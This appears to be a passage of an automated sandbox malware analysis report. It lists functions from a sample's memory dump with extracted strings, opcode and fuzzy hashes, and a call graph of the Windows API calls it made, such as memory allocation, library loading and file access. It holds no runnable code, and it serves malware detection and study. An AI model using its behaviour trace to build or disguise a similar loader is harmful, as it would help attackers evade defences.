                                                                    • Opcode ID: 4d06f275a8043cd661dc09b1a28e8be5988d937cb3f8b290f1dde54db9b9bf86
                                                                    • Instruction ID: cd82c3cb6a9f5038b4302364b2239ebc97168fa09939185ff525733fe16f16dc
                                                                    • Opcode Fuzzy Hash: 4d06f275a8043cd661dc09b1a28e8be5988d937cb3f8b290f1dde54db9b9bf86
                                                                    • Instruction Fuzzy Hash: 94C12FB1D00228AEEF20DFA4CD44BDEBBB9AF45304F1081D9D548AB241E7B55A89CF65
                                                                    Function 04F1E252 Relevance: 31.4, Strings: 25, Instructions: 152COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #$ B$#$%y$19$2$>$D$E$GP$PP$Qt$V$`J$c6$f$m$o$v>$x$y$}$,$>$_
                                                                    • API String ID: 0-4064015928
                                                                    • Opcode ID: f9c0323d79a86cf96ea87b235a2e149c65fd8ba9be13959325738da97b8e7f17
                                                                    • Instruction ID: 2e81aca95ab85caf580affc6ef44079c2e17fbadf4c46d8b99b49cf6f15e8b59
                                                                    • Opcode Fuzzy Hash: f9c0323d79a86cf96ea87b235a2e149c65fd8ba9be13959325738da97b8e7f17
                                                                    • Instruction Fuzzy Hash: A1A178B0D05669CBFB61CF81C9587CEBBB1BB45308F1081D9C55C2B291C7BA1A89CF91
                                                                    Function 04F2EE15 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                    • API String ID: 0-392141074
                                                                    • Opcode ID: 080871b2f831aeba83b25e39561e0cc75b6ac08220c0dbab3a8b1a0380a8890f
                                                                    • Instruction ID: da04d033a3a88a100d09cb01ac2d9597c7bd957eebce3349ee4554c77362d3c3
                                                                    • Opcode Fuzzy Hash: 080871b2f831aeba83b25e39561e0cc75b6ac08220c0dbab3a8b1a0380a8890f
                                                                    • Instruction Fuzzy Hash: 7D712CB1C1422CAAEB25DFA4CC41FEFB778BF08704F044199E518A6140EB756B498FA5
                                                                    Function 04F2EE0B Relevance: 16.4, Strings: 13, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                    • API String ID: 0-392141074
                                                                    • Opcode ID: 2d4c76c84092abe7bd97bac7b333bd4c3e69f1e84a1674ff772b68cb33053c76
                                                                    • Instruction ID: 763031217a8d8a20e6a85b4320a44b2f89974978fb7663eba17e510bedb6ffbc
                                                                    • Opcode Fuzzy Hash: 2d4c76c84092abe7bd97bac7b333bd4c3e69f1e84a1674ff772b68cb33053c76
                                                                    • Instruction Fuzzy Hash: 75613DB1C1422CAAEB15DFA4CC81FEFB778BF08704F14419DE519A6180EB716B498F65
                                                                    Function 04F22ACC Relevance: 13.8, Strings: 11, Instructions: 87COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                    • API String ID: 0-685823316
                                                                    • Opcode ID: 6419724ab03b44f927eb6cf9b7928965be4c5f36b2f2f73e8572da932dcbbfa9
                                                                    • Instruction ID: 304e3a6ae4ff609b378ba23a539d56fdf9a2d41a00fa5e125795f5f6c591c60d
                                                                    • Opcode Fuzzy Hash: 6419724ab03b44f927eb6cf9b7928965be4c5f36b2f2f73e8572da932dcbbfa9
                                                                    • Instruction Fuzzy Hash: 573178B1D11218AEEF50DFD4CC45FEE77B9AF08704F10415CE618B6180DBB566488BA5
                                                                    Function 04F29F51 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$P$e$i$m$o$r$x
                                                                    • API String ID: 0-620024284
                                                                    • Opcode ID: 44d4370a7813810a2989e90fecec71072ca4293b906850e3e696890c29b06c1c
                                                                    • Instruction ID: 79d2d5a89f78cb7e66f9ede66c57cffdaed996161d810160a75c5dab6de46c3c
                                                                    • Opcode Fuzzy Hash: 44d4370a7813810a2989e90fecec71072ca4293b906850e3e696890c29b06c1c
                                                                    • Instruction Fuzzy Hash: 464183B6D10218BAEB20EFA4CC41FEF777CAF54305F008599A509A7141EAB5A7498FA1
                                                                    Function 04F17652 Relevance: 10.1, Strings: 8, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4$XQcQ$X]_Q$gURU$uZPF$vA]X$w\F[$y[N]
                                                                    • API String ID: 0-2821098887
                                                                    • Opcode ID: 7f432af6460a2995abb8cca98f81b90d649f76a292b951e04b714884795a36f0
                                                                    • Instruction ID: 0da6970d9f5f2f9364941cce017a1d156975683c794865c8b39ff2493338d698
                                                                    • Opcode Fuzzy Hash: 7f432af6460a2995abb8cca98f81b90d649f76a292b951e04b714884795a36f0
                                                                    • Instruction Fuzzy Hash: D631DBB0C0129CAADB14CFA5DA8868DBFB0FB05789F608658C42A7F250D7318A46CF16
                                                                    Function 04F1B105 Relevance: 10.0, Strings: 8, Instructions: 43COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: .$9$E$\$]$k$v${
                                                                    • API String ID: 0-2353787348
                                                                    • Opcode ID: 88834001db3557e557b6cad3b1b2839488c4ac0411528f7f1a25666a5ff65d37
                                                                    • Instruction ID: 933157b16566c0fd6183f4fc2315a8b1f54a3769fdac8637b8db90fba4f9cfed
                                                                    • Opcode Fuzzy Hash: 88834001db3557e557b6cad3b1b2839488c4ac0411528f7f1a25666a5ff65d37
                                                                    • Instruction Fuzzy Hash: 1911DB10D087CED9DB12C7BC88186AEBF715F23224F0882D9D4E52B2D2D2795746D7A6
                                                                    Function 04F36FE5 Relevance: 8.9, Strings: 7, Instructions: 119COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: L$S$\$a$c$e$l
                                                                    • API String ID: 0-3322591375
                                                                    • Opcode ID: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                                    • Instruction ID: 7ddd30cbfd564f6942ac11b5d996558bbb69c0392a26885bb0e62f02489eb1d5
                                                                    • Opcode Fuzzy Hash: 8f4c519c9909a893d81e62540394deb999eed95763021c3b612dc346d2a56b0e
                                                                    • Instruction Fuzzy Hash: FF4188B2C14218AFDB50DF94DC85FEFB7F9EF48315F05425AD909A7100E771AA458BA0
                                                                    Function 04F2EBD0 Relevance: 7.7, Strings: 6, Instructions: 173COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: F$P$T$f$r$x
                                                                    • API String ID: 0-2523166886
                                                                    • Opcode ID: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                                    • Instruction ID: acbf161409d84f17f92b3776658db63717d80656b8eb4ad6d7350faa7c9a1960
                                                                    • Opcode Fuzzy Hash: 9db016c893a184016c5455f322f280f74789b03c5f4d852205d45972a8fa8b44
                                                                    • Instruction Fuzzy Hash: D051C171D04715ABEB34DFA4CD48BEBB3B8EF04709F14095DE509A6280E7B4B646CBA1
                                                                    Function 04F2E2E5 Relevance: 6.4, Strings: 5, Instructions: 200COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $i$l$o$u
                                                                    • API String ID: 0-2051669658
                                                                    • Opcode ID: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                                    • Instruction ID: 82c6dc38995ae2790cf33c46518d0ec26b7357c80a2710798aaf1d90444f90bb
                                                                    • Opcode Fuzzy Hash: a10f01c6d770215435f0762050d85e75f964bf6b8d75c8a9c79b2b972c7ff28b
                                                                    • Instruction Fuzzy Hash: D4615DB1900714AFDB24DFA4CC80FEFB7F8AB48704F204558E519A7240EA35BA46CB60
                                                                    Function 04F2DE33 Relevance: 6.4, Strings: 5, Instructions: 124COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                    • API String ID: 0-1319493415
                                                                    • Opcode ID: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                                    • Instruction ID: df27efb6303ffa9423ba568bb2bd7178efb53dce887f352a56089d07d3fff170
                                                                    • Opcode Fuzzy Hash: 4261ce16aa55c9cc2150ed2655b6de1e9688f5e3d29e7288017ec5cbc7771f53
                                                                    • Instruction Fuzzy Hash: 1D413BB19512197EFB12EF90CC42FFF777CAF95605F004148F604AA180EAB4761687BA
                                                                    Function 04F2DE35 Relevance: 6.4, Strings: 5, Instructions: 120COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: FALS$FALSETRUE$FALSETRUE$TRUE$TRUE
                                                                    • API String ID: 0-1319493415
                                                                    • Opcode ID: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                                    • Instruction ID: 0e976cab059db12da3f8f028caa2fe4d890320543613d627327707cb2c4efc8f
                                                                    • Opcode Fuzzy Hash: 0a71a11d0122dc6dc4232f484f7fab842d81d84fe5f16c1e6b2bd0da621ec2c8
                                                                    • Instruction Fuzzy Hash: 50310BB1911119BEFB12EF90CC42FEF777CAF95605F004049FA04AA180EB747A1687BA
                                                                    Function 04F2DF72 Relevance: 5.3, Strings: 4, Instructions: 303COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $e$k$o
                                                                    • API String ID: 0-3624523832
                                                                    • Opcode ID: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                                    • Instruction ID: 098163a7f335c518188a9222b409b296fd292e02842a609cd17a7f13625e1154
                                                                    • Opcode Fuzzy Hash: 0fdbfd859b254c50f4ddacddcbcae484d62a0a62ffd9ddef7b5615e02d7dc383
                                                                    • Instruction Fuzzy Hash: B7B10CB5A00704AFDB24DFE4CD85FEFB7B9AF88704F208558F619A7240DA75AA41CB50
                                                                    Function 04F2E8AE Relevance: 5.2, Strings: 4, Instructions: 237COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $e$h$o
                                                                    • API String ID: 0-3662636641
                                                                    • Opcode ID: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                                    • Instruction ID: 4c1c4a32b4327507bc808e6931263577f0bb332fa76f3d3b923e141f043b4097
                                                                    • Opcode Fuzzy Hash: 9094042da362fade89b2a9ec36f8dde849583de0457ad82bb3a72615c0fc361d
                                                                    • Instruction Fuzzy Hash: AA8186B2C00259BAEB25EB90CD85FEFB37DEF48204F0041DAE509A6145EB747B458FA1
                                                                    Function 04F2DF75 Relevance: 5.2, Strings: 4, Instructions: 181COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $e$k$o
                                                                    • API String ID: 0-3624523832
                                                                    • Opcode ID: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                                    • Instruction ID: b445a87bf979f23f439ea0f268298edc159661f2f199b41389c2260c8772f4e7
                                                                    • Opcode Fuzzy Hash: 0149a4d6ebd2700885d608626cd4678d50ed7b01d94d46ab7e143af91d0dd946
                                                                    • Instruction Fuzzy Hash: 61612175A00708AFDB54DFA4CC84FEFB7BDAF88704F104558E65997244DB71AA41CB50
                                                                    Function 04F2E8B5 Relevance: 5.1, Strings: 4, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $e$h$o
                                                                    • API String ID: 0-3662636641
                                                                    • Opcode ID: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                                    • Instruction ID: 939569cb194982379650af1484163ac4e9b7d2ebe7700a453b8d3ddc7af12a60
                                                                    • Opcode Fuzzy Hash: acbd758d60b195d01349b28db54d33025c5bbbe81ccadb31d74f701fdef2195e
                                                                    • Instruction Fuzzy Hash: 594193B1C01359AAEB10EFA4CD45FEFB3B9EF48304F1041DAA20DA6145EB746B458FA5
                                                                    Function 04F2A135 Relevance: 5.1, Strings: 4, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.3258034274.0000000004D50000.00000040.00000001.00040000.00000000.sdmp, Offset: 04D50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4d50000_PcwrDoOfOMD.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 6$U$g$r
                                                                    • API String ID: 0-389700855
                                                                    • Opcode ID: e422878323fb3e73fd7f61e04b1b83c77e7237fb3c1efe2c06a355c2d2ee90c9
                                                                    • Instruction ID: c1e6b07111ebcc0356b4fc2cd45d6a979771dc9441af3cc0ef2444070c7705ff
                                                                    • Opcode Fuzzy Hash: e422878323fb3e73fd7f61e04b1b83c77e7237fb3c1efe2c06a355c2d2ee90c9
                                                                    • Instruction Fuzzy Hash: B03132B1E10119BBEB14DFA4DD41FEF77B8EF05308F004198E908A7280EB75AA458BE5

                                                                    Execution Graph

                                                                    Execution Coverage:2.4%
                                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                                    Signature Coverage:2.3%
                                                                    Total number of Nodes:439
                                                                    Total number of Limit Nodes:71
                                                                    execution_graph 101764 28c8c04 101765 28c8c14 101764->101765 101767 28c8adf 101765->101767 101768 28c74c0 101765->101768 101769 28c74d6 101768->101769 101771 28c750c 101768->101771 101769->101771 101772 28c7330 LdrLoadDll 101769->101772 101771->101767 101772->101771 101773 28b9f80 101774 28ba2cb 101773->101774 101776 28ba659 101774->101776 101777 28db450 101774->101777 101778 28db476 101777->101778 101783 28b4230 101778->101783 101780 28db482 101782 28db4bb 101780->101782 101786 28d5950 101780->101786 101782->101776 101790 28c3650 101783->101790 101785 28b423d 101785->101780 101787 28d59b2 101786->101787 101789 28d59bf 101787->101789 101814 28c1e00 101787->101814 101789->101782 101792 28c366d 101790->101792 101791 28c3680 101791->101785 101792->101791 101794 28da1c0 101792->101794 101796 28da1da 101794->101796 101795 28da209 101795->101791 101796->101795 101801 28d8e30 101796->101801 101802 28d8e4a 101801->101802 101808 31d2c0a 101802->101808 101803 28d8e73 101805 28db7f0 101803->101805 101811 28d9ad0 101805->101811 101807 28da27f 101807->101791 101809 31d2c1f LdrInitializeThunk 101808->101809 101810 31d2c11 101808->101810 101809->101803 101810->101803 101812 28d9aea 101811->101812 101813 28d9af8 RtlFreeHeap 101812->101813 101813->101807 101815 28c1e3b 101814->101815 101830 28c8290 101815->101830 101817 28c1e43 101818 28c211b 101817->101818 101841 28db8d0 101817->101841 101818->101789 101820 28c1e59 101821 28db8d0 RtlAllocateHeap 101820->101821 101822 28c1e6a 101821->101822 101823 28db8d0 RtlAllocateHeap 101822->101823 101825 28c1e7b 101823->101825 101827 28c1f15 101825->101827 101852 28c6e30 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101825->101852 101844 28c4990 101827->101844 101828 28c20cd 101848 28d8290 101828->101848 101831 28c82bc 101830->101831 101853 28c8180 101831->101853 101834 28c82e9 101837 28c82f4 101834->101837 101859 28d9780 101834->101859 101835 28c8301 101836 28c831d 101835->101836 101839 28d9780 NtClose 101835->101839 101836->101817 101837->101817 101840 28c8313 101839->101840 101840->101817 101867 28d9a90 101841->101867 101843 28db8e8 101843->101820 101845 28c49b4 101844->101845 101846 28c49bb 101845->101846 101847 28c49f7 LdrLoadDll 101845->101847 101846->101828 101847->101846 101849 28d82f2 101848->101849 101851 28d82ff 101849->101851 101870 28c2130 101849->101870 101851->101818 101852->101827 101854 28c8276 101853->101854 101855 28c819a 101853->101855 101854->101834 101854->101835 101862 28d8ec0 101855->101862 101858 28d9780 NtClose 101858->101854 101860 28d979a 101859->101860 101861 28d97a8 NtClose 101860->101861 101861->101837 101863 28d8edd 101862->101863 101866 31d35c0 LdrInitializeThunk 101863->101866 101864 28c826a 101864->101858 101866->101864 101868 28d9aaa 101867->101868 101869 28d9ab8 RtlAllocateHeap 101868->101869 101869->101843 101873 28c2150 101870->101873 101886 28c8560 101870->101886 101872 28c26b3 101872->101851 101873->101872 101890 28d1510 101873->101890 101876 28c2372 101898 28dc9c0 101876->101898 101878 28c21ae 101878->101872 101893 28dc890 101878->101893 101880 28c2387 101882 28c23cb 101880->101882 101904 28c0c80 101880->101904 101882->101872 101883 28c0c80 LdrInitializeThunk 101882->101883 101908 28c8500 101882->101908 101883->101882 101884 28c2520 101884->101882 101885 28c8500 LdrInitializeThunk 101884->101885 101885->101884 101887 28c856d 101886->101887 101888 28c858c SetErrorMode 101887->101888 101889 28c8593 101887->101889 101888->101889 101889->101873 101892 28d1531 101890->101892 101912 28db760 101890->101912 101892->101878 101894 28dc8a6 101893->101894 101895 28dc8a0 101893->101895 101896 28db8d0 RtlAllocateHeap 101894->101896 101895->101876 101897 28dc8cc 101896->101897 101897->101876 101899 28dc930 101898->101899 101900 28dc98d 101899->101900 101901 28db8d0 RtlAllocateHeap 101899->101901 101900->101880 101902 28dc96a 101901->101902 101903 28db7f0 RtlFreeHeap 101902->101903 101903->101900 101905 28c0c91 101904->101905 101919 28d9a00 101905->101919 101909 28c8513 101908->101909 101924 28d8d30 101909->101924 101911 28c853e 101911->101882 101915 28d98e0 101912->101915 101914 28db791 101914->101892 101916 28d9978 101915->101916 101918 28d990e 101915->101918 101917 28d998b NtAllocateVirtualMemory 101916->101917 101917->101914 101918->101914 101920 28d9a1a 101919->101920 101923 31d2c70 LdrInitializeThunk 101920->101923 101921 28c0ca2 101921->101884 101923->101921 101925 28d8dae 101924->101925 101927 28d8d5b 101924->101927 101929 31d2dd0 LdrInitializeThunk 101925->101929 101926 28d8dd0 101926->101911 101927->101911 101929->101926 101930 28cfc00 101931 28cfc64 101930->101931 101959 28c66d0 101931->101959 101933 28cfd9e 101934 28cfd97 101934->101933 101966 28c67e0 101934->101966 101936 28cff43 101937 28cfe1a 101937->101936 101938 28cff52 101937->101938 101970 28cf9f0 101937->101970 101940 28d9780 NtClose 101938->101940 101942 28cff5c 101940->101942 101941 28cfe56 101941->101938 101943 28cfe61 101941->101943 101944 28db8d0 RtlAllocateHeap 101943->101944 101945 28cfe8a 101944->101945 101946 28cfea9 101945->101946 101947 28cfe93 101945->101947 101979 28cf8e0 CoInitialize 101946->101979 101948 28d9780 NtClose 101947->101948 101950 28cfe9d 101948->101950 101951 28cfeb7 101982 28d9270 101951->101982 101953 28cff32 101954 28d9780 NtClose 101953->101954 101955 28cff3c 101954->101955 101957 28db7f0 RtlFreeHeap 101955->101957 101956 28cfed5 101956->101953 101958 28d9270 LdrInitializeThunk 101956->101958 101957->101936 101958->101956 101960 28c6703 101959->101960 101961 28c6727 101960->101961 101986 28d9300 101960->101986 101961->101934 101963 28c674a 101963->101961 101964 28d9780 NtClose 101963->101964 101965 28c67ca 101964->101965 101965->101934 101967 28c6805 101966->101967 101991 28d9130 101967->101991 101971 28cfa0c 101970->101971 101972 28c4990 LdrLoadDll 101971->101972 101974 28cfa27 101972->101974 101973 28cfa30 101973->101941 101974->101973 101975 28c4990 LdrLoadDll 101974->101975 101976 28cfafb 101975->101976 101977 28c4990 LdrLoadDll 101976->101977 101978 28cfb55 101976->101978 101977->101978 101978->101941 101980 28cf945 101979->101980 101981 28cf9db CoUninitialize 101980->101981 101981->101951 101983 28d928d 101982->101983 101996 31d2ba0 LdrInitializeThunk 101983->101996 101984 28d92ba 101984->101956 101987 28d931a 101986->101987 101990 31d2ca0 LdrInitializeThunk 101987->101990 101988 28d9343 101988->101963 101990->101988 101992 28d914a 101991->101992 101995 31d2c60 LdrInitializeThunk 101992->101995 101993 28c6879 101993->101937 101995->101993 101996->101984 101997 28c7540 101998 28c755c 101997->101998 102006 28c75af 101997->102006 101999 28d9780 NtClose 101998->101999 101998->102006 102003 28c7577 101999->102003 102000 28c76e7 102002 28c76c1 102002->102000 102009 28c6b30 NtClose LdrInitializeThunk LdrInitializeThunk 102002->102009 102007 28c6960 NtClose LdrInitializeThunk LdrInitializeThunk 102003->102007 102006->102000 102008 28c6960 NtClose LdrInitializeThunk LdrInitializeThunk 102006->102008 102007->102006 102008->102002 102009->102000 102010 28cb140 102015 28cae50 102010->102015 102012 28cb14d 102029 28caac0 102012->102029 102014 28cb163 102016 28cae75 102015->102016 102040 28c8760 102016->102040 102019 28cafc3 102019->102012 102021 28cafda 102021->102012 102022 28cafd1 102022->102021 102024 28cb0c7 102022->102024 102059 28ca510 102022->102059 102026 28cb12a 102024->102026 102068 28ca880 102024->102068 102027 28db7f0 RtlFreeHeap 102026->102027 102028 28cb131 102027->102028 102028->102012 102030 28caad6 102029->102030 102037 28caae1 102029->102037 102031 28db8d0 RtlAllocateHeap 102030->102031 102031->102037 102032 28cab08 102032->102014 102033 28c8760 GetFileAttributesW 102033->102037 102034 28cae22 102035 28cae3b 102034->102035 102036 28db7f0 RtlFreeHeap 102034->102036 102035->102014 102036->102035 102037->102032 102037->102033 102037->102034 102038 28ca510 RtlFreeHeap 102037->102038 102039 28ca880 RtlFreeHeap 102037->102039 102038->102037 102039->102037 102041 28c877f 102040->102041 102042 28c8786 GetFileAttributesW 102041->102042 102043 28c8791 102041->102043 102042->102043 102043->102019 102044 28d36f0 102043->102044 102045 28d36fe 102044->102045 102046 28d3705 102044->102046 102045->102022 102047 28c4990 LdrLoadDll 102046->102047 102048 28d3737 102047->102048 102049 28d3746 102048->102049 102072 28d31b0 LdrLoadDll 102048->102072 102051 28db8d0 RtlAllocateHeap 102049->102051 102055 28d38f1 102049->102055 102052 28d375f 102051->102052 102053 28d38e7 102052->102053 102052->102055 102056 28d377b 102052->102056 102054 28db7f0 RtlFreeHeap 102053->102054 102053->102055 102054->102055 102055->102022 102056->102055 102057 28db7f0 RtlFreeHeap 102056->102057 102058 28d38db 102057->102058 102058->102022 102060 28ca536 102059->102060 102073 28cdf40 102060->102073 102062 28ca5a8 102064 28ca730 102062->102064 102066 28ca5c6 102062->102066 102063 28ca715 102063->102022 102064->102063 102065 28ca3d0 RtlFreeHeap 102064->102065 102065->102064 102066->102063 102078 28ca3d0 102066->102078 102069 28ca8a6 102068->102069 102070 28cdf40 RtlFreeHeap 102069->102070 102071 28ca92d 102070->102071 102071->102024 102072->102049 102075 28cdf64 102073->102075 102074 28cdf6d 102074->102062 102075->102074 102076 28db7f0 RtlFreeHeap 102075->102076 102077 28cdfb0 102076->102077 102077->102062 102079 28ca3ed 102078->102079 102082 28cdfc0 102079->102082 102081 28ca4f3 102081->102066 102083 28cdfe4 102082->102083 102084 28ce08e 102083->102084 102085 28db7f0 RtlFreeHeap 102083->102085 102084->102081 102085->102084 102086 28d63c0 102087 28d641a 102086->102087 102089 28d6427 102087->102089 102090 28d3e10 102087->102090 102091 28db760 NtAllocateVirtualMemory 102090->102091 102092 28d3e51 102091->102092 102093 28c4990 LdrLoadDll 102092->102093 102095 28d3f50 102092->102095 102096 28d3e91 102093->102096 102094 28d3ed2 Sleep 102094->102096 102095->102089 102096->102094 102096->102095 102097 28d9480 102098 28d9537 102097->102098 102100 28d94af 102097->102100 102099 28d954a NtCreateFile 102098->102099 102101 28ca001 102102 28ca016 102101->102102 102103 28ca01b 102101->102103 102104 28ca04d 102103->102104 102105 28db7f0 RtlFreeHeap 102103->102105 102105->102104 102106 28d0500 102107 28d051d 102106->102107 102108 28c4990 LdrLoadDll 102107->102108 102109 28d0538 102108->102109 102110 28d1b40 102111 28d1b5c 102110->102111 102112 28d1b98 102111->102112 102113 28d1b84 102111->102113 102115 28d9780 NtClose 102112->102115 102114 28d9780 NtClose 102113->102114 102117 28d1b8d 102114->102117 102116 28d1ba1 102115->102116 102120 28db910 RtlAllocateHeap 102116->102120 102119 28d1bac 102120->102119 102121 31d2ad0 LdrInitializeThunk 102122 28d16d1 102127 28d95f0 102122->102127 102124 28d16f2 102125 28d9780 NtClose 102124->102125 102126 28d1719 102125->102126 102128 28d969a 102127->102128 102130 28d961e 102127->102130 102129 28d96ad NtReadFile 102128->102129 102129->102124 